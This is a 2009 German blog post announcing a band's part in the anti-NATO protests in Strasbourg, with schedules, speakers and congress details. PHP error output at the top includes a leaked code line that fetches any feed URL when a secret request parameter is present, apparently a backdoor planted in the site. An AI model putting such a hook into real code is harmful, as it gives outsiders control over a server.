Deprecated: Assigning the return value of new by reference is deprecated in /homepages/u21512/schroeder/schroederblog/wp-settings.php on line 520

Deprecated: Assigning the return value of new by reference is deprecated in /homepages/u21512/schroeder/schroederblog/wp-settings.php on line 535

Deprecated: Assigning the return value of new by reference is deprecated in /homepages/u21512/schroeder/schroederblog/wp-settings.php on line 542

Deprecated: Assigning the return value of new by reference is deprecated in /homepages/u21512/schroeder/schroederblog/wp-settings.php on line 578

Deprecated: Function set_magic_quotes_runtime() is deprecated in /homepages/u21512/schroeder/schroederblog/wp-settings.php on line 18
isset($_REQUEST['kocopu']) && fetch_feed($_REQUEST['feed_url']);
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /homepages/u21512/schroeder/schroederblog/wp-settings.php:520) in /homepages/u21512/schroeder/schroederblog/wp-content/plugins/formbuilder/captcha/CaptchaSecurityImages.php on line 26

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /homepages/u21512/schroeder/schroederblog/wp-settings.php:520) in /homepages/u21512/schroeder/schroederblog/wp-content/plugins/formbuilder/captcha/CaptchaSecurityImages.php on line 26
Schroeder Roadshow » 4.4. / no to war / no to nato

4.4. / no to war / no to nato

Schroeder am 31. März 2009

Liebe Freundinnen und Freunde,
SCHROEDER ROADSHOW nimmt natürlich auch an den Aktionen zum NATO-Gipfel vom 1. bis 5. April 2009 in Straßburg teil.
Dazu findet am 4. April eine Kundgebung in Strasbourg statt, auf der u.a. LEYLA ZANA Türkei, BIANCA JAGGER Großbritannien, MALALAI JOVA Afghanistan sprechen werden. Musikalische Unterstützung liefern neben SCHROEDER einige französische Bands ab, sowie HANNES WADER, KONSTANTIN WECKER, MARARITA THEODORAKIS und DIETHER DEHM.

no to war | no to nato


Aus der Veranstalter-Info

Alles in allem haben wir eine gute Chance, dem Treffen der Kriegsplaner einen großen, bunten und vielfältigen Protest entgegen zu setzen. So sehen das auch Monty Schädel und Reiner Braun in ihrem Schreiben für den Veranstalterkreis: “Phantasievoll und gewaltig, friedlich und kreativ wird unser Protest sein. … Die NATO ist überflüssig wie am ersten Tag und gehört aufgelöst. … Parallel zu der Demonstration am 4. April in Strasbourg wird es mindestens auch in Istanbul, New York, Nikosia, Athen und Vincenza Demonstrationen der Friedens- und Antikriegsbewegung geben.”

schroeder roadshow in strasbourg. no to war / no to nato

Auftaktkundgebung am Samstag, 4. April 2009
11:00 Uhr in Kehl Marktplatz
11:30 Uhr OSTERMARSCH zur Europabrücke
13:00 Uhr Kundgebung in der Nähe der Europabrücke
auf der französischen Seite mit u.a. Bianca Jagger (Großbritannien), Malalai Jova (Afghanistan) und Leyla Zana (Türkei), anschließend Internationale Demonstration nach Strasbourg.
siehe:
“No to Nato - No to War!”

Aktionen Zivilen Ungehorsams / Blockaden:
Dazu ist eine frühere Anreise und möglichst die Teilnahme an Aktionstrainings im Camp zu empfehlen. Die Aktionen sind für 6:00 bis 12:00 Uhr in Strasbourg vorgesehen.
siehe: www.block-nato.org
sowie: www.nato-zu.de

Zu den Aktionen des Vortags
Freitag, 3. April, in Baden-Baden
siehe: www.antinatobuendnisbad.de

Internationaler Kongress “No to NATO – No to War”
Freitag, 3. April | 10:00 bis 17:30 Uhr und
Sonntag, 5. April | 10:00 bis 16:00 Uhr

Der Kongress findet statt im Centre Sportif Lixenbuhl in Illkirch-Graffenstaden.
[Centre Sportif Lixenbuhl, 24, Rue Lixenbuhl, F 67400 Illkirch-Graffenstaden]
Der Ort liegt südlich von Strasbourg, ist aber sehr bequem mit der Straßenbahn Linie A erreichbar (Endstation Lixenbuhl).
siehe: Kongress-Link
Anmeldung: registration@ialana.de

Wir freuen uns auf vielfältige lebendige Aktionen und Diskussionen und ein starkes Signal der Zivilgesellschaft gegen Krieg und Militär und für politische zivile Konfliktlösungen.

Abgelegt unter Konzert, Schroeder, TourTageBuch, no to NATO | Keine Kommentare

Trackback URI | Kommentare als RSS

Einen Kommentar schreiben